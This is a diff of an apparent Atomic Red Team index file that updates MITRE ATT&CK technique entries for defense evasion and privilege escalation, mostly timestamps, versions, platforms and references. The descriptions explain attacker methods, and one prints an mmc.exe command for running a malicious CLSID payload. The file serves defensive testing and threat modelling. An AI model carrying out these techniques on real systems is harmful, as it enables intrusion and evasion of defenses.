+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -30465,6 +30716,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -30473,20 +30727,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -30543,6 +30828,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -30553,13 +30839,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -30618,11 +30903,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -30662,8 +30946,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -30671,13 +30957,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -30708,9 +30994,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -30967,7 +31250,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -30989,11 +31272,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -31060,8 +31342,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -31079,7 +31361,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests:
     - name: Alternate Data Streams (ADS)
@@ -31324,7 +31605,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests:
     - name: Process Injection via mavinject.exe
@@ -31375,7 +31655,7 @@ defense-evasion:
         name: powershell
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -31388,6 +31668,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -31424,17 +31705,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -31480,9 +31761,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -31520,7 +31798,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -31539,7 +31817,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests:
     - name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
@@ -31608,7 +31885,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -31632,12 +31909,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -31721,7 +31996,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -31743,7 +32017,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -31777,12 +32051,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -31834,9 +32106,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges
@@ -32155,7 +32426,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -32202,7 +32472,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -32215,12 +32485,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests:
     - name: Lolbin Jsc.exe compile javascript to exe
@@ -32381,7 +32652,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -32403,7 +32674,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -32446,7 +32716,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -32470,8 +32740,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -32519,7 +32787,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -32557,8 +32825,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests:
     - name: User scope COR_PROFILER
@@ -32737,7 +33003,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -32789,8 +33055,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests:
     - name: Process Injection via Extra Window Memory (EWM) x64 executable
@@ -32829,23 +33093,24 @@ privilege-escalation:
         elevation_required: false
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -32892,7 +33157,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -32924,8 +33189,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -32939,6 +33204,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -32951,11 +33220,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests:
     - name: Scheduled Task Startup Script
@@ -33395,7 +33667,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -33484,7 +33755,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -33572,7 +33842,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests:
     - name: Append malicious start-process cmdlet
@@ -33695,7 +33964,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -33727,7 +33995,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -33750,11 +34018,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -33812,9 +34079,8 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests:
     - name: ListCronjobs
@@ -33888,7 +34154,7 @@ privilege-escalation:
         elevation_required: false
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -33989,7 +34255,6 @@ privilege-escalation:
